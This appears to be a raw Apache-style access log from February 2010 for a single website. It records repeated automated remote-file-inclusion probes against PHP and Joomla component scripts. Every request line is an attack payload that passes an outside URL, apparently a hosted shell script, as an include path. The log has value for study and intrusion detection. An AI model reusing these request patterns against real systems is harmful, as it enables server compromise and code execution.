218.38.136.126 - - [11/Feb/2010:07:50:29 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:50:32 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:50:32 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:50:33 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:50:34 -0800] "GET /logs/access_100201.log%20%20/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:50:34 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:50:34 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:50:35 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:50:35 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:50:35 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:50:36 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:50:36 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:50:36 -0800] "GET /logs/access_100201.log%20%20/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:50:42 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:50:42 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:50:42 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [11/Feb/2010:07:50:55 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [11/Feb/2010:07:50:55 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [11/Feb/2010:07:50:55 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:51:12 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:51:12 -0800] "GET /logs/access_100201.log%20%20/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:51:12 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:51:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:51:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:51:40 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:51:40 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:51:40 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [11/Feb/2010:07:51:40 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:51:41 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:51:41 -0800] "GET /main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:51:42 -0800] "GET /logs//main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
218.38.136.126 - - [11/Feb/2010:07:51:42 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [11/Feb/2010:07:51:42 -0800] "GET /logs/access_100201.log%20%20/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [11/Feb/2010:07:51:42 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:51:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:51:57 -0800] "GET /logs/access_100130.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:51:58 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:51:58 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:51:58 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:52:06 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:52:06 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:52:06 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:52:10 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:52:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:52:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [11/Feb/2010:07:52:56 -0800] "GET /logs/access_100112.log/components/com_forum/download.php?phpbb_root_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:52:56 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:52:56 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:52:56 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:52:56 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:52:56 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:52:56 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:52:57 -0800] "GET /logs/access_100130.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:52:57 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:52:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:06 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:06 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:06 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:07 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:07 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:22 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:22 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:22 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:24 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:24 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:26 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:26 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:26 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:27 -0800] "GET /logs/access_100110.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:07:53:28 -0800] "GET /logs/access_100110.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:53:29 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:53:29 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:53:29 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.216.131 - - [11/Feb/2010:07:53:30 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
124.217.216.131 - - [11/Feb/2010:07:53:31 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:53:34 -0800] "GET /logs/access_100130.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:53:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:53:34 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:53:34 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:53:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:53:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:54:29 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:54:29 -0800] "GET /logs/access_100130.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:54:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:07:55:16 -0800] "GET /logs/access_100118.log%20%20/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:07:55:16 -0800] "GET /logs/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:07:55:16 -0800] "GET /index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:55:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:55:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:55:40 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:56:02 -0800] "GET /logs/access_100118.log%20%20/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:56:02 -0800] "GET /logs/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:56:02 -0800] "GET /index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:07:56:36 -0800] "GET /logs/access_100202.log/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:07:56:36 -0800] "GET /logs/access_100203.log/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:41 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:41 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:41 -0800] "GET /logs/access_100127.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:41 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:41 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:43 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:44 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:44 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:07:56:48 -0800] "GET /logs/access_100126.log%20%20/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:48 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:52 -0800] "GET /logs/access_100127.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:52 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:56:52 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:56:54 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:56:54 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:56:54 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:07:56:54 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:57:31 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:07:57:51 -0800] "GET /logs/access_100126.log%20%20/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:07:58:06 -0800] "GET /logs/access_100104.log//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:07:58:06 -0800] "GET /errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:07:58:07 -0800] "GET /logs//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:07:58:54 -0800] "GET /logs/access_100118.log/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:59:17 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:07:59:18 -0800] "GET /logs/access_100126.log/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:00:01 -0800] "GET /logs/access_100118.log/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:08:00:04 -0800] "GET /logs/access_100118.log//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
